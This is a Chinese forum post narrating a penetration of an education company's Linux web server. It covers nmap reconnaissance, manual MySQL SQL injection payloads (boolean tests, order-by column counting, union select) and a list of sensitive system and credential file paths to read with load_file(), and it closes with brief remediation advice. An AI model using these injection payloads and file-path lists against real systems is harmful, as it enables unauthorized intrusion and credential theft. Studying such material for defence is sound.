找回密码
 立即注册
查看: 2727|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:
1 [7 O, W2 z; B/ ^* _. S一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……! ~7 C9 Y% a3 Q8 M
第一步:获取需要的信息
6 f, j% O& V5 S  Z, r0 I! W# G由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。. N# F% B9 n8 U2 D# _0 W* p" }
注:以下为保护特用XXX代替敏感信息8 Y' W$ ]0 o. `3 k* D9 S" a( l
顺手先PING了一下他们的域名:
/ m4 B. S2 ]6 P  a3 b$ Dping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
- U$ Q# k0 ?" X8 i# Q1 S9 O1 o64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
$ M- G# \$ w4 }1 }7 }- N顺便了解一下TTL,学好基础知识才能一路顺风:
) b2 q8 i+ a; s" CTTL:(Time To Live ) 生存时间, l& k+ d( V* ?8 Z+ x
指定数据包被路由器丢弃之前允许通过的网段数量。9 a3 z9 p* i: l+ Q6 ]# C
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。% S" o2 m4 {7 P2 u. H( D7 p) s5 l
使用PING时涉及到的 ICMP 报文类型
  }6 F* {, @" N3 a0 ?一个为ICMP请求回显(ICMP Echo Request)
8 ~" e+ N, @0 b: r; v" E; F8 z# X+ A一个为ICMP回显应答(ICMP Echo Reply)
9 B1 J/ a* c3 S+ n6 E1 @& nTTL 字段值可以帮助我们识别操作系统类型。
# C- b* S- X  l2 Z0 U& o; iUNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
( S8 G7 D$ z) n) KCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64( h7 L1 @7 d3 f* k7 |
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
% E' c; I( i6 B+ ?% e微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
2 y: I  n5 u# [( I5 f当然,返回的TTL值是相同的6 O0 X! B/ D! B5 k2 X( a/ O1 U
但有些情况下有所特殊+ W! r: M. G5 v1 R0 `
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 649 u; Q% d: D8 b# u  `1 V
FreeBSD 4.1, 4.0, 3.4;0 E# s3 C& H; T& [
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;4 G+ J/ O: ?% ^9 Y! O
OpenBSD 2.6, 2.7,
% Q/ r: W* v3 I: a" V% ?, a. x: M! ]NetBSD3 y% c' h3 A6 G/ P
HP UX 10.20+ A6 S. ]" C+ l  U, J
ICMP 回显应答的 TTL 字段值为 255
: F- C1 p3 l! W7 MWindows 95/98/98SE
% \% d2 M  d# `2 O7 WWindows ME  O/ w3 G$ x) i; g0 `/ F
ICMP 回显应答的 TTL 字段值为 32
* t& E. i. r, @2 }9 VWindows NT4 WRKS- j. O  c; Q, M& E7 z- z9 N
Windows NT4 Server
+ t% A- R/ k0 M& ~* C" EWindows 2000
: j2 X' H  m  @: B' I  [Windows XP
9 Q# `- }' L( {ICMP 回显应答的 TTL 字段值为 128
9 j- J# Q, b# n这样,我们就可以通过这种方法来辨别操作系统; Z- T; {3 c: S6 v
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
* M6 z, Z& T: G2 }& i5 S; k: z用NMAP扫描一下:
7 C' G& w: o/ a, k) {, p2 i5 m1 Knmap -sT -O XXX.XXX.XXX.XXX
$ {5 N# m- Q' L' r2 A. G. k如果没有装WinPcap则会弹出提示:& T* q- A) r4 g
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr+ l; ]+ \0 e: B% ~5 ^6 P8 x
ade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(  T$ A+ _2 \; N+ c) d3 J8 g
) mode — Nmap may not function completely# h2 {; o* v  {6 b
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
" a9 `9 @5 q( h- ^and iphlpapi.dll be installed. You seem to be missing one or both of these.  Win
* T8 R! X  t1 H5 [pcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
1 c3 y4 C  s' u2 P  D0 Yd later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
  o# S3 L; u- m0 ~% w% @ersions, you may be able to take iphlpapi.dll from another system and place it i
2 `. p7 ~* G! \( t8 In your system32 dir (e.g. c:\windows\system32).
' e. s. l) C9 f: vQUITTING!) M6 k. {) l, v! V
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe* I; T3 h8 Q6 T7 g4 Q) O& e7 J
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
: Q9 o" X. Z/ C, uInteresting ports on XXX.XXX.XXX.XXX:
( k% g5 i+ r: ?. ?Not shown: 986 closed ports; x# E5 j9 t9 Q; S3 L; b4 w
PORT     STATE    SERVICE
6 ?; P; X3 q) q4 n21/tcp   open     ftp, d" G6 T  s" C# I# M5 i
22/tcp   open     ssh
6 Q/ }$ k; Q2 t9 d) z1 m* F$ |23/tcp   open     telnet3 r, Y" F$ x9 ^1 ?1 }4 ?/ z$ [; c
80/tcp   open     http
5 l6 m, b  p! ^/ c* q# [111/tcp  open     rpcbind
' q. Q4 i% |& x; L( y3 b135/tcp  filtered msrpc
4 \7 X; d* C0 U+ F4 C, K139/tcp  filtered netbios-ssn% ^! k9 d; i( f. }
445/tcp  filtered microsoft-ds
& W5 F/ N6 M7 X/ z8 z513/tcp  open     login
7 c# K( {$ \3 [* v( E' ]1 i514/tcp  open     shell* s2 a( W1 C5 k1 c" D; j
593/tcp  filtered http-rpc-epmap  [- ^5 G# _/ [5 m" |+ x. v
1720/tcp filtered H.323/Q.9319 Z* {- m9 V+ ^: P
3306/tcp open     mysql" W) F, {8 t" C% L2 G6 o
4444/tcp filtered krb524
7 i: ?( b' ~/ EDevice type: WAP/ C. S( L- Y% c
Running: Linux 2.4.X
; }$ X  [7 ?, l3 WOS details: DD-WRT (Linux 2.4.35s)' J5 g* I4 a5 _* ^4 L0 Z
Network Distance: 13 hops6 K+ B+ W0 p% F/ \. W( \- v
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
& c2 _5 ?+ V$ c9 C0 Mlogin as:! c! W* p/ L: `/ c  {- ]
Telnet23端口也是开着的,用telnet 命令链接一下:' q  D, L5 D( c& C8 ^2 g% s) X5 [
telnet XXX.XXX.XXX.XXX+ A! _- N5 F3 K
提示:
' S5 y) ^) q. F' D. y" A1 BRed Hat Enterprise Linux Server release 5.2 (Tikanga). [* f) K2 ?: h1 P. q5 [, Q
Kernel 2.6.18-92.el5PAE on an i686
" Y. ?; u9 Y. d/ t8 j) H; n4 w. j1 n3 Qlogin:0 ?* b' h9 R$ r% V$ c
获取HTTP头信息:
+ n; h7 [! c* u4 f4 m& Y( J2 e在本地执行如下PHP代码
+ l7 B) I: M6 U, m$ L<?php/ Y4 |; ]" t$ _# h( [4 m; h+ k# [
$url = ‘XXX.XXX.XXX.XXX’;/ {* ?0 _3 h  ^( ~
print_r(get_headers($url));) }- j! @) `3 x* w
print_r(get_headers($url, 1));% N2 p1 C$ Q$ L- L/ i. @
?>$ K! S+ n3 g) _
将以上代码保存为PHP文件,执行:
6 y; X1 J/ e1 PArray ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
! p+ M) L. h+ @8 e+ ?现在可以得出结论:: x" o" {( {$ f$ Q6 T% ]
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
4 z8 W% ~) `6 t' L3 S- U1 ~内核版本:Kernel 2.6.18-92.el5PAE on an i686' W0 _7 q; Q8 Y. d, V0 E3 B# A$ j
WEB服务器版本:nginx/0.7.61$ s8 A1 W' F# R
第二步,开始测试寻找漏洞. B2 }0 U  v0 y! z
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
  v" z. e" {+ C1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的+ i& f. O' W& H5 r! K' Z
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试# L# k) `8 p  t. f
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常% N8 V1 j% I& m! x- _
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
7 b  }2 [' |/ o$ I  [恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
/ v4 D" B! H% b7 C3、手工注入:2 V! D$ i3 y$ j1 y, Q2 `
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。: j5 r' y7 A( M5 `2 E$ W
3.1 猜测当前表字段数
' s; ^, [: b! @http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
) \$ W) @4 C4 A# X  ^0 M4 T- @( T  j此处猜测有个简单的算法,都是有技巧的吗,呵呵
3 _- w& i3 \7 z9 J2 q算法简单如下:" ]& D5 J" n+ F( Z+ C
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
" @9 K6 m0 y- Q$ M第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;
* U# ]2 G" K0 Z( \2 |; p- ^需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
- M) ?, V4 u: h: b以此来判断,是否过界,配合取中算法猜出字段数。
# G/ d, J+ E$ K* r# i0 W& J举例:9 O9 a4 f: }' ?6 r/ w$ I0 n
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
& B( a# Y! K# fhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误3 Q/ x6 ^, d% G7 z* Y1 V6 w
此时3则为我们要找的字段数。
) H% W; F8 X2 A. n# _8 i7 k4 A3.2 配合union联合查询字段在页面所位置+ m4 L8 R$ o$ r. |2 ?2 \
我们已经知道了字段数为3,此时则可以做如下操作:7 E7 u7 v4 r3 a, D  v
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,36 ^$ y, _0 k6 o* F+ D; a
+ w8 T6 _8 b5 W  \* N- X8 `
这样就可以测试到哪些字段在页面上有所显示了,如图:
4 s0 Q/ m3 c5 d8 Y3 U, C  ]+ u
3.3 查敏感信息
" ^6 D: n1 G- o, O. \! l* A这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
* @5 T8 p9 ]* I2 @" a  qhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database(), _; b8 H$ S! s/ u! K
3.3.1 先查数据库用户、数据库名,以备后用,如图:' f" v8 w- U, W+ v5 Z
9 Q: E" p+ q  y5 D
得到数据库用户为root、数据库名为DBxx;
& _5 `. k2 _& y8 }- ^# g3.3.2 查配置文件$ u3 p6 q- a+ g' W- g6 S
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。9 X& \0 a$ O5 L: C+ B2 j( b
查看文件有一定的条件限制:
( k% r0 Z( g- i6 l欲读取文件必须在服务器上
  @3 M* O: ]  M1 K$ n: n) w必须指定文件完整的路径6 ?- P8 [  u1 [2 g
必须有权限读取并且文件必须完全可读8 \2 G% S: f$ T3 H0 W3 f* F3 v
欲读取文件必须小于 max_allowed_packet7 y2 Z# h6 @# r8 I% w0 D; E
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
% @$ q$ R5 E/ e- _常用的一些:
! o: e3 K0 W4 {) m( ?; e5 }/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
& g/ l- S4 E5 Y( Q  y$ ~( F1 @/usr/local/apache2/conf/httpd.conf7 a' E+ m! N: A$ L9 h
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
" ]3 z; M7 f1 l* A/usr/local/app/php5/lib/php.ini //PHP相关设置
6 s  @3 s+ C0 ^" j/etc/sysconfig/iptables //从中得到防火墙规则策略; E( @+ h* I( F9 \. H; B" A& N, {
/etc/httpd/conf/httpd.conf // apache配置文件
. J# C- Q& A* |/ M% x  c1 M/etc/rsyncd.conf //同步程序配置文件
# R( h7 N% E0 t2 l4 Z. }8 l/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
3 Q: T) o: k5 J  p7 c9 Z4 s9 e0 y0 j/etc/my.cnf //mysql的配置文件
8 C9 n/ P$ ]. s3 @- a( m; ]/etc/redhat-release //系统版本5 v+ g' b6 r7 {4 w( H: |3 B- z
/etc/issue
4 J. V/ Q. D6 C" N& k/etc/issue.net
- C5 |9 q. C) |7 _' U* @1 mc:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码7 i3 X4 ^# ]4 S% c4 j, _
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
& l/ F# M# Z: w: b" h- m/ Nc:\Program Files\Serv-U\ServUDaemon.ini9 f8 k6 m0 ~3 R  P
c:\windows\my.ini //MYSQL配置文件
" j8 l9 @  b$ R) P& i5 pc:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件) }1 ?2 d4 _( G# K& D
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件," U# \. U6 m/ v
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码+ k+ @  b# Q0 ]/ R$ I% s
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此' s# y. n+ c$ H
c:\Program Files\RhinoSoft.com\ServUDaemon.exe* M5 J$ A7 @2 M
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件. [+ @) B# P$ d- g) i" i" l
//存储了pcAnywhere的登陆密码8 {* S0 f$ h$ ~
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。4 \: c: I0 f/ ]( m% j
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。* D! I6 _! q' c, Y( V
最后:防范措施* S- b5 p* X4 V( B1 f
1、修复PHP注入漏洞;' a1 }3 }) I  S( \
2、Mysql使用普通权限的用户;7 ?; B3 P8 K4 B) ]
3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表